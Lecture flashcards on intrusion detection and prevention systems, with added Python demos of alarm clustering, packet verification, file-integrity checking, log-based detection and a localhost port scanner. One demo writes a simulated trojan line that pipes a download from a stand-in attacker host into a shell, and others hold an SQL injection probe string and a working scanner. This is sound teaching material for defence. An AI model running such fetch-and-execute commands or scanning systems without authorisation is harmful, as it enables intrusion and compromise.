Lecture 7 Flashcards
?
is a type of attack on information assets in which the instigator attempts to gain entry into a system or disrupt the normal operation of a system, almost always with the intent to do malicious harm.
Identify
Intrusion
?
activities that deter an intrusion
Identify
Intrusion prevention
?
procedures and systems that identify system intrusions
Identify
Intrusion detection
?
Activities that finalize the restoration of operations to a normal state
Identify
1/2 ?
Intrusion correction
?
Activities that seek to identify the source & method of an attack so that it can be prevented from recurring
Identify
2/2 ?
Intrusion correction
?
Intrusion prevention systems
Identify
Intrusion Detection Systems
Extension
?
: indication that an attack is occurring
Identify
IDPS Terminology
Alarm or alert
?
: attacker changes the format and/or timing of activities to avoid being detected
Identify
IDPS Terminology
Evasion
?
: event triggers alarm – no real attack
Identify
IDPS Terminology
False attack stimulus
?
: failure of the IDPS to react to an actual attack
Identify
IDPS Terminology
False negative
?
: alarm activates in the absence of an actual attack
Identify
IDPS Terminology
False positive
?
: alarm events that are accurate but do not pose threats
Identify
IDPS Terminology
Noise
?
: rules & configuration guidelines governing the implementation & operation of IDPS
Identify
IDPS Terminology
Site policy
?
: ability to dynamically modify config in response to environmental activity
Identify
IDPS Terminology
Site policy awareness
?
: event that triggers alarms in event of real attack
Identify
IDPS Terminology
True attack stimulus
?
: adjusting an IDPS
Identify
IDPS Terminology
Tuning
?
: measure of an IDPS's ability to correctly detect & identify a type of attack
Identify
IDPS Terminology
Confidence value
?
: Classification of IDPS alerts
Identify
IDPS Terminology
Alarm filtering
?
: grouping almost identical alarms happening at close to the same time
Identify
IDPS Terminology
Alarm clustering and compaction
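Added example, not from the lecture: alarm filtering and alarm clustering/compaction applied to a constructed stream of IDPS alerts. The alert format, the site policy values (confidence floor, known-benign source, 60-second window) and the confidence numbers are assumptions made for illustration.

```python
"""Alarm filtering, then alarm clustering and compaction, over an alert stream.

Added example, not from the lecture. The alert tuple layout, the site policy
and the confidence values are assumptions; the alerts are constructed, not captured.
"""

# Constructed alerts: (timestamp_seconds, signature, source, confidence)
ALERTS = [
    (0,   "SSH brute force", "10.0.0.5",   0.9),
    (2,   "SSH brute force", "10.0.0.5",   0.9),
    (5,   "SSH brute force", "10.0.0.5",   0.9),
    (7,   "ICMP sweep",      "10.0.0.9",   0.3),   # below the confidence floor: noise
    (30,  "SQL injection",   "10.0.0.7",   0.8),
    (31,  "SQL injection",   "10.0.0.7",   0.8),
    (200, "SSH brute force", "10.0.0.5",   0.9),   # outside the window: new cluster
    (201, "SSH brute force", "10.0.0.200", 0.9),   # the org's own scanner: policy-exempt
]

# Assumed site policy: minimum confidence to keep, sources known to be benign
# (e.g. the organisation's vulnerability scanner), and the clustering window.
SITE_POLICY = {
    "min_confidence": 0.5,
    "known_benign_sources": {"10.0.0.200"},
    "cluster_window_s": 60,
}


def filter_alarms(alerts, policy):
    """Alarm filtering: drop noise (low confidence) and policy-exempt sources."""
    return [a for a in alerts
            if a[3] >= policy["min_confidence"]
            and a[2] not in policy["known_benign_sources"]]


def cluster_alarms(alerts, policy):
    """Alarm clustering and compaction: near-identical alarms (same signature and
    source) within cluster_window_s of a cluster's first alarm collapse into one
    record carrying a count, first/last timestamps and the highest confidence."""
    clusters = []
    open_clusters = {}          # (signature, source) -> index of the latest cluster
    for ts, sig, src, conf in sorted(alerts):
        key = (sig, src)
        idx = open_clusters.get(key)
        if idx is not None and ts - clusters[idx]["first"] <= policy["cluster_window_s"]:
            c = clusters[idx]
            c["count"] += 1
            c["last"] = ts
            c["confidence"] = max(c["confidence"], conf)
        else:
            clusters.append({"signature": sig, "source": src, "first": ts,
                             "last": ts, "count": 1, "confidence": conf})
            open_clusters[key] = len(clusters) - 1
    return clusters


def compact(alerts, policy=SITE_POLICY):
    """Filter first, then cluster: what an analyst console would display."""
    return cluster_alarms(filter_alarms(alerts, policy), policy)


if __name__ == "__main__":
    for c in compact(ALERTS):
        print(f"{c['signature']:16} {c['source']:12} x{c['count']:<3} "
              f"t={c['first']}..{c['last']} conf={c['confidence']}")
```

Eight raw alerts become three compacted ones: the first three SSH alarms collapse into one record with count 3, the two SQL injection alarms into one with count 2, and the SSH alarm at t=200 starts a fresh cluster because it falls outside the 60-second window. Tuning means adjusting SITE_POLICY: lowering min_confidence lets the ICMP sweep through, widening the window merges the late SSH alarm into the first cluster.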
?
Prevent problem behaviors by increasing the perceived risk of discovery and punishment
Identify
1/6 ?
IDS (Intrusion Detection Systems)
?
Detect attacks and other security violations
Identify
2/6 ?
IDS (Intrusion Detection Systems)
?
Detect and deal with preambles to attacks
Identify
3/6 ?
IDS (Intrusion Detection Systems)
?
Document the existing threat to an organization
Identify
4/6 ?
IDS (Intrusion Detection Systems)
?
Act as quality control for security design & administration
Identify
5/6 ?
IDS (Intrusion Detection Systems)
?
Provide useful information about intrusions that take place
Identify
6/6 ?
IDS (Intrusion Detection Systems)
? ??
(2) Types of IDS
Enumerate
- Network based
- Host-based
?
- Focused on protecting network information assets
- Variant: wireless
- Variant: network behavior analysis
Identify
1/2 Types of IDS
Network based
?
Focused on protecting a server's or host's information assets
Identify
2/2 Types of IDS
Host-based
?
Resides on a computer or appliance connected to a segment of the organization's network
Identify
Types of IDS - 1/6 ?
Network-Based
?
Monitors network traffic on the segment
Identify
Types of IDS - 2/6 ?
Network-Based
?
Monitors packets
Identify
Types of IDS - 3/6 ?
Network-Based
?
Uses a monitoring port (switched port analyzer, SPAN) that copies the segment's traffic to the sensor
Identify
Types of IDS - 4/6 ?
Network-Based
?
Looks for attack patterns
Identify
Types of IDS - 5/6 ?
Network-Based
?
Compares measured activity to known signatures
Identify
Types of IDS - 6/6 ?
Network-Based
?
Checks packet structure: headers conform to the protocol specification
Identify
Types of IDS - Compares measured activity to known signatures - 1/2 ?
Protocol verification
?
Checks packet use: the protocol is used the way the application is supposed to use it
Identify
Types of IDS - Compares measured activity to known signatures - 2/2 ?
Application verification
? ??
(2) Forms of attack that are not easily discerned
Enumerate
- Fragmented packets
- Malformed packets
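Added example, not from the lecture: protocol verification as a network-based sensor would do it, parsing IPv4/TCP packets and flagging fragmented and malformed ones (the two forms of attack listed above that are not easily discerned by signature matching alone). The packets are constructed inline, not captured; the build helper, the sample addresses and the list of "suspicious" flag combinations are assumptions for illustration.

```python
"""Protocol verification in a network-based IDS: parse IPv4/TCP packets and
flag malformed or fragmented ones before signature matching is attempted.

Added example, not part of the lecture. All packets are constructed inline
(no capture); build_ipv4_tcp exists only so the checks can be exercised.
"""
import struct

TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK, TCP_URG = 1, 2, 4, 8, 16, 32


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum; returns 0 when run over a header whose
    checksum field is already correct."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src, dst, sport, dport, tcp_flags, version=4, ihl=5,
                   total_len=None, ip_flags=0, frag_offset=0):
    """Assemble an IPv4+TCP packet; malformed variants come from overriding fields."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, tcp_flags, 8192, 0, 0)
    total = 20 + len(tcp) if total_len is None else total_len
    hdr = struct.pack("!BBHHHBBH4s4s", (version << 4) | ihl, 0, total, 0x1234,
                      (ip_flags << 13) | frag_offset, 64, 6, 0,
                      bytes(int(o) for o in src.split(".")),
                      bytes(int(o) for o in dst.split(".")))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + tcp


def verify_packet(pkt: bytes) -> list:
    """Return findings for one packet; an empty list means it passed verification."""
    findings = []
    if len(pkt) < 20:
        return ["truncated: shorter than minimum IPv4 header"]
    ver_ihl, _, total_len, _, flags_frag, _, proto, _, _, _ = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4:
        findings.append(f"malformed: IP version {version}")
    if ihl < 20:
        findings.append(f"malformed: IHL {ihl} bytes < 20")
        return findings                      # later offsets would be meaningless
    if total_len != len(pkt):
        findings.append(f"malformed: total length {total_len} != {len(pkt)} bytes on the wire")
    if ip_checksum(pkt[:ihl]) != 0:
        findings.append("malformed: bad IP header checksum")
    mf, offset = (flags_frag >> 13) & 1, (flags_frag & 0x1FFF) * 8
    if mf or offset:
        findings.append(f"fragmented: MF={mf} offset={offset}; reassemble before matching signatures")
        return findings                      # only the first fragment carries the TCP header
    if proto != 6:
        return findings
    if len(pkt) < ihl + 20:
        return findings + ["truncated: TCP header incomplete"]
    sport, dport, _, _, doff, tflags = struct.unpack("!HHIIBB", pkt[ihl:ihl + 14])
    if (doff >> 4) * 4 < 20:
        findings.append("malformed: TCP data offset < 20 bytes")
    if sport == 0 or dport == 0:
        findings.append("suspicious: TCP port 0")
    if (tflags & TCP_SYN) and (tflags & TCP_FIN):
        findings.append("suspicious: SYN and FIN set together")
    if (tflags & 0x3F) == 0:
        findings.append("suspicious: null scan (no TCP flags)")
    if (tflags & (TCP_FIN | TCP_PSH | TCP_URG)) == (TCP_FIN | TCP_PSH | TCP_URG):
        findings.append("suspicious: Xmas scan flags (FIN+PSH+URG)")
    return findings


# Constructed packets, not captured traffic
NORMAL = build_ipv4_tcp("10.0.0.5", "10.0.0.10", 40000, 80, TCP_SYN)
SAMPLES = {
    "normal": NORMAL,
    "first_fragment": build_ipv4_tcp("10.0.0.5", "10.0.0.10", 40000, 80, TCP_SYN, ip_flags=1),
    "later_fragment": build_ipv4_tcp("10.0.0.5", "10.0.0.10", 40000, 80, TCP_SYN, frag_offset=185),
    "xmas": build_ipv4_tcp("10.0.0.5", "10.0.0.10", 40000, 80, TCP_FIN | TCP_PSH | TCP_URG),
    "null": build_ipv4_tcp("10.0.0.5", "10.0.0.10", 40000, 80, 0),
    "bad_ihl": build_ipv4_tcp("10.0.0.5", "10.0.0.10", 40000, 80, TCP_SYN, ihl=4),
    "short_total_len": build_ipv4_tcp("10.0.0.5", "10.0.0.10", 40000, 80, TCP_SYN, total_len=10),
    "bad_checksum": NORMAL[:8] + b"\x01" + NORMAL[9:],   # TTL altered after checksum computed
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:16} {verify_packet(pkt) or ['ok']}")
```

The point of the fragment branch is the evasion case from the terminology cards: a sensor that matched signatures fragment by fragment would never see the attack string that is split across two of them, so fragmented packets are reported and handed to reassembly instead of being matched.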
?
Monitors and analyzes wireless network traffic
Identify
1/3 ?
Wireless NIDPS
?
Looks for potential problems with the wireless protocols
Identify
2/3 ?
Wireless NIDPS
?
Cannot evaluate & diagnose issues with higher-layer protocols (it sees only the wireless link layer)
Identify
3/3 ?
Wireless NIDPS
? ?? ??? ???? ?????
(5) Issues associated with implementation
Enumerate
Wireless NIDPS
- Physical security
- Sensor range
- Access point and wireless switch locations
- Wired network connections
- Cost
?
Resides on a particular computer or server & monitors traffic only on that system
Identify
Types of IDS - 1/6 ?
Host-Based
?
Also known as system integrity verifiers
Identify
Types of IDS - 2/6 ?
Host-Based
?
Works on the principle of configuration and change management
Identify
Types of IDS - 3/6 ?
Host-Based
?
Classifies files in categories & applies various notification actions based on rules
Identify
Types of IDS - 4/6 ?
Host-Based
?
Maintains its own log file
Identify
Types of IDS - 5/6 ?
Host-Based
?
Can monitor multiple computers simultaneously
Identify
Types of IDS - 6/6 ?
Host-Based
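Added example, not from the lecture: a host-based IDS acting as a system integrity verifier, which baselines file hashes, classifies files into categories and applies a per-category notification rule when something changes. The directory layout, the categories and the rules are assumptions; the file tree is created in a temporary directory so the demo runs offline and touches nothing real.

```python
"""Host-based IDS as a system integrity verifier: hash a baseline of files,
classify each file into a category and apply that category's notification
rule when the file changes.

Added example, not part of the lecture. Directory layout, categories and
rules are assumptions; the tree lives in a temporary directory.
"""
import fnmatch, hashlib, os, shutil, tempfile

# Assumed rules: category -> (path globs, action on change)
# "alert": any change raises an alarm; "log": record only; "ignore": expected to change
CATEGORIES = {
    "critical_config": (["etc/passwd", "etc/sudoers", "etc/ssh/*"], "alert"),
    "binaries":        (["bin/*", "sbin/*"], "alert"),
    "logs":            (["var/log/*"], "ignore"),
}
DEFAULT_ACTION = "log"   # anything not matched above


def classify(relpath):
    for category, (patterns, _) in CATEGORIES.items():
        if any(fnmatch.fnmatch(relpath, p) for p in patterns):
            return category
    return "other"


def action_for(relpath):
    return CATEGORIES.get(classify(relpath), (None, DEFAULT_ACTION))[1]


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """relative path -> (sha256, permission bits, size) for every file under root."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.stat(full)
            snap[rel] = (hash_file(full), st.st_mode & 0o777, st.st_size)
    return snap


def compare(baseline, current):
    """(severity, path, change) for each difference the rules care about."""
    events = []
    for rel in sorted(set(baseline) | set(current)):
        action = action_for(rel)
        if action == "ignore":
            continue
        if rel not in current:
            change = "deleted"
        elif rel not in baseline:
            change = "added"
        elif baseline[rel][0] != current[rel][0]:
            change = "content changed"
        elif baseline[rel][1] != current[rel][1]:
            change = f"mode {baseline[rel][1]:o} -> {current[rel][1]:o}"
        else:
            continue
        events.append(("ALERT" if action == "alert" else "LOG", rel, change))
    return events


def demo():
    """Baseline a constructed tree, tamper with it, and report per the rules."""
    root = tempfile.mkdtemp()

    def write(rel, text):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(text)

    try:
        write("etc/passwd", "root:x:0:0::/root:/bin/sh\n")
        write("bin/ls", "#!/bin/sh\necho ls\n")
        write("var/log/auth.log", "ok\n")
        write("home/alice/notes.txt", "todo\n")
        baseline = snapshot(root)
        # Tampering: extra uid-0 account, trojaned binary, new binary, log growth, user edit
        write("etc/passwd", "root:x:0:0::/root:/bin/sh\nevil:x:0:0::/root:/bin/sh\n")
        write("bin/ls", "#!/bin/sh\ncurl http://attacker.invalid/x | sh\n")
        write("sbin/backdoor", "#!/bin/sh\n")
        write("var/log/auth.log", "ok\nok\n")
        write("home/alice/notes.txt", "done\n")
        return compare(baseline, snapshot(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for severity, path, change in demo():
        print(f"{severity:5} {path}: {change}")
```

The rules are what keep this from being noise: log growth is expected and produces nothing, a user's own file produces a log entry only, and the three changes in the critical categories produce alarms. In a real deployment the baseline and the verifier's own log would be stored off-host (or on read-only media), since an attacker who has root can otherwise re-baseline over their own changes.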
?
Examines an application for abnormal events
Identify
1/5 ?
Application Based
?
Tracks interaction between users and applications
Identify
2/5 ?
Application Based
?
Able to trace specific activity back to an individual user
Identify
3/5 ?
Application Based
?
Able to view data that is encrypted on the wire, because it sees it inside the application before encryption or after decryption
Identify
4/5 ?
Application Based
?
Can examine encryption/decryption process
Identify
5/5 ?
Application Based
?
Two dominant methodologies
Identify
IDS Methodologies
- Signature-based (knowledge-based)
- Statistical-anomaly approach
?
- Examines data traffic in search of patterns that match known signatures
- Widely used
- Signature database must be continually updated
- Attack time frame sometimes problematic: a slow, methodical attack may not match within the window the IDS keeps
Identify
1/2 IDS Methodologies
Signature Based
?
Based on the frequency with which network activities take place
Identify
2/2 IDS Methodologies 1/7 ?
Statistical Anomaly Based
?
Collect statistical summaries of “normal” traffic to form baseline
Identify
2/2 IDS Methodologies 2/7 ?
Statistical Anomaly Based
?
Measure current traffic against baseline
Identify
2/2 IDS Methodologies 3/7 ?
Statistical Anomaly Based
?
Traffic outside baseline will generate alert
Identify
2/2 IDS Methodologies 4/7 ?
Statistical Anomaly Based
?
Can detect new types of attacks
Identify
2/2 IDS Methodologies 5/7 ?
Statistical Anomaly Based
?
Requires much more overhead and processing capacity
Identify
2/2 IDS Methodologies 6/7 ?
Statistical Anomaly Based
?
May not detect minor changes to baseline
Identify
2/2 IDS Methodologies 7/7 ?
Statistical Anomaly Based
?
Similar to NIDS
Identify
1/5 ?
Log file Monitors
?
Reviews logs
Identify
2/5 ?
Log file Monitors
?
Looks for patterns & signatures in log files
Identify
3/5 ?
Log file Monitors
?
Able to look at multiple log files from different systems
Identify
4/5 ?
Log file Monitors
?
Large storage requirement
Identify
5/5 ?
Log file Monitors
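Added example, not from the lecture, covering the two IDS methodologies and the log file monitor cards above: a signature matcher and a statistical anomaly detector run over the same log lines collected from two systems, the way a log file monitor would run them. The log lines are constructed, and the signatures, the 20-minute training window and the threshold multiplier k are assumptions.

```python
"""Signature-based vs. statistical-anomaly detection, run the way a log file
monitor would over lines collected from several systems.

Added example, not part of the lecture. The log lines are constructed, and
the signatures, training window and threshold multiplier are assumptions.
"""
import re
from collections import Counter
from statistics import mean, pstdev

# Constructed log: (minute, host, line). 45 minutes of background on two hosts.
LOG = []
for m in range(45):
    n = 10 + [-2, -1, 0, 1, 2][m % 5]        # normal: 8..12 failed logins per minute
    LOG += [(m, "bastion", f"sshd: Failed password for alice from 192.0.2.{i} port 5{m:02}")
            for i in range(n)]
    LOG.append((m, "web", f"GET /index.html 200 from 198.51.100.{m}"))
# Known attack: SQL injection probe (matches a signature)
LOG.append((21, "web", "GET /search?q=' OR 1=1-- 200 from 203.0.113.9"))
# Novel attack: 30-failure burst from one IP (no signature; statistically abnormal)
LOG += [(22, "bastion", "sshd: Failed password for root from 203.0.113.7 port 4001")] * 30
# Slow attack: one extra failure per minute for 20 minutes (stays under the threshold)
LOG += [(m, "bastion", "sshd: Failed password for root from 203.0.113.8 port 4002")
        for m in range(23, 43)]

SIGNATURES = {   # assumed knowledge base; a real one has thousands of entries
    "SQL injection": re.compile(r"(?i)(?:'|%27)\s*or\s+\d+\s*=\s*\d+"),
    "Path traversal": re.compile(r"\.\./\.\./"),
}
FAILED = re.compile(r"Failed password for \S+ from (\S+)")


def signature_scan(log):
    """Signature-based: every line is matched against every known pattern."""
    return [(minute, host, name, line)
            for minute, host, line in log
            for name, rx in SIGNATURES.items() if rx.search(line)]


def failures_per_minute(log):
    """Feature extraction for the anomaly detector: failed logins per (host, minute)."""
    counts = Counter()
    for minute, host, line in log:
        if FAILED.search(line):
            counts[(host, minute)] += 1
    return counts


def anomaly_scan(log, training_minutes=20, k=3.0):
    """Statistical anomaly: baseline = mean + k*stddev over the training window;
    later minutes whose count exceeds it raise (minute, host, count, threshold)."""
    counts = failures_per_minute(log)
    hosts = {host for host, _ in counts}
    last_minute = max(minute for _, minute in counts)
    alerts = []
    for host in sorted(hosts):
        base = [counts[(host, m)] for m in range(training_minutes)]
        threshold = mean(base) + k * pstdev(base)
        for m in range(training_minutes, last_minute + 1):
            if counts[(host, m)] > threshold:
                alerts.append((m, host, counts[(host, m)], round(threshold, 2)))
    return alerts


if __name__ == "__main__":
    for minute, host, name, line in signature_scan(LOG):
        print(f"[signature] min {minute} {host}: {name}: {line}")
    for minute, host, count, thr in anomaly_scan(LOG):
        print(f"[anomaly]   min {minute} {host}: {count} failures > threshold {thr}")
    # The slow attacker (203.0.113.8) appears in neither list: a false negative for both.
```

Run as written, the signature pass finds only the SQL injection probe and the anomaly pass finds only the 30-failure burst in minute 22 (threshold 14.24 against a baseline mean of 10). The slow attacker is missed by both, which is the "attack time frame" and "minor changes to the baseline" limitation from the cards. Retuning with k=1.0 catches the slow attacker's busier minutes but also flags minute 44, which is pure background: a false positive bought with a lower threshold.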
?
Vary according to organization policy, objectives, and system capabilities
Identify
1/3 ?
Responses to IDS
?
Administrator must be careful not to increase the problem
Identify
2/3 ?
Responses to IDS
?
Responses may be active or passive
Identify
3/3 ?
Responses to IDS
? ?? ???
(3) Control Strategies
Enumerate
- Centralized
- Partially distributed
- Fully distributed
?
- All IDS control functions are implemented and managed in a centralized location
- One management system
Identify
1/3 Control Strategies
Centralized
?
Opposite of centralized
Identify
2/3 Control Strategies 1/3 ?
Fully Distributed
?
All control functions applied at the physical location of each IDS component
Identify
2/3 Control Strategies 2/3 ?
Fully Distributed
?
- Each sensor/agent is best configured to deal with its own environment
- Reaction to attacks sped up
Identify
2/3 Control Strategies 3/3 ?
Fully Distributed
?
Individual agents respond to local threats
Identify
3/3 Control Strategies 1/3 ?
Partially Distributed Control
?
Report to a hierarchical central facility
Identify
3/3 Control Strategies 2/3 ?
Partially Distributed Control
?
One of the more effective methods
Identify
3/3 Control Strategies 3/3 ?
Partially Distributed Control
?
Decoy systems
Identify
1/3 ?
Honey Pots
?
Lure potential attackers away from critical systems
Identify
2/3 ?
Honey Pots
?
Encourage attacks against themselves
Identify
3/3 ?
Honey Pots
?
Collection of honey pots
Identify
1/4 ?
Honey Net
?
Connects honey pots on a subnet
Identify
2/4 ?
Honey Net
?
Contains pseudo-services that emulate well-known services
Identify
3/4 ?
Honey Net
?
Filled with fictitious information
Identify
4/4 ?
Honey Net
?
Protected honey pot
Identify
1/3 ?
Padded Cell
?
IDS detects an attack and transfers the attacker to a simulated environment
Identify
2/3 ?
Padded Cell
?
Monitors the actions of the attacker
Identify
3/3 ?
Padded Cell
?
Detect an intrusion and trace the incident back to its source
Identify
1/3 ?
Trap and Trace Systems
?
Consist of a honey pot or padded cell & an alarm
Identify
2/3 ?
Trap and Trace Systems
?
Similar to concept of caller ID
Identify
3/3 ?
Trap and Trace Systems
?
Hacking back into the attacker's system to learn about them; considered unethical
Identify
Trap and Trace Systems
Back-hack
?
Legal drawbacks to trap and trace (attracting attention with tantalizing information vs. luring someone into committing a crime)
Identify
Trap and Trace Systems
Enticement and entrapment
?
Help find vulnerabilities in system, holes in security components, and unsecure aspects of the network
Identify
1/3 ?
Scanning and Analysis Tools
?
Allow system administrators to see what the attacker sees
Identify
2/3 ?
Scanning and Analysis Tools
?
May run into problems with the ISP (scanning traffic can violate its acceptable-use terms)
Identify
3/3 ?
Scanning and Analysis Tools
? ?? ??? ???? ?????
(5) Scanning and Analysis Tools
Enumerate
Scanning and Analysis Tools
- Port scanners
- Firewall analysis tools
- Operating system detection tools
- Vulnerability scanners
- Packet sniffers
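Added example, not from the lecture: the first tool in the list, a TCP connect() port scanner with banner grabbing, together with a throwaway local service so it can be exercised offline against 127.0.0.1. The banner text, the timeout and the port window are assumptions. It shows why the ISP card above matters: every probe is a full TCP connection that the target (and its IDS) sees, so scan only hosts you are authorised to test.

```python
"""TCP connect() port scanner with banner grabbing, plus a local throwaway
service so it can be exercised offline.

Added example, not part of the lecture. The banner, timeout and port window
are assumptions. Scan only hosts you are authorised to test.
"""
import socket, threading


def start_local_service(banner=b"SSH-2.0-example\r\n"):
    """Constructed target: listener on 127.0.0.1 at an OS-chosen port that
    greets each client with a banner. Returns (server_socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def scan_port(host, port, timeout=0.5):
    """Full TCP handshake (what an IDS sees as a completed connection), then
    read whatever the service volunteers. Returns (port, state, banner)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            if s.connect_ex((host, port)) != 0:
                return (port, "closed", b"")      # RST received
        except socket.timeout:
            return (port, "filtered", b"")        # no answer at all: likely dropped
        try:
            banner = s.recv(128)
        except (socket.timeout, OSError):
            banner = b""
        return (port, "open", banner.strip())


def scan(host, ports, timeout=0.5):
    """Return only the open ports, as (port, 'open', banner)."""
    return [r for r in (scan_port(host, p, timeout) for p in ports) if r[1] == "open"]


def demo():
    """Start the throwaway service and scan a small window around its port."""
    srv, port = start_local_service()
    try:
        window = [p for p in range(port - 2, port + 3) if 1 <= p <= 65535]
        return port, scan("127.0.0.1", window)
    finally:
        try:
            srv.shutdown(socket.SHUT_RDWR)   # wake the accept() thread (not every OS allows this)
        except OSError:
            pass
        srv.close()


if __name__ == "__main__":
    port, found = demo()
    print(f"service on {port}; open ports found: {found}")
```

A connect() scan is the noisiest kind: each open port yields a completed handshake in the target's logs and a signature hit on any NIDS watching the segment, which is exactly the view of the attacker the cards describe an administrator wanting. Distinguishing "closed" (RST came back) from "filtered" (nothing came back) is what tells you whether a firewall sits in the path.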
?
– validation of a user's identity
Identify
Access Control Tools
Authentication
? ?? ??? ????
(4) general ways authentication is carried out
Enumerate
Access Control Tools
- What the user knows
- What the user has
- Who the user is
- What the user produces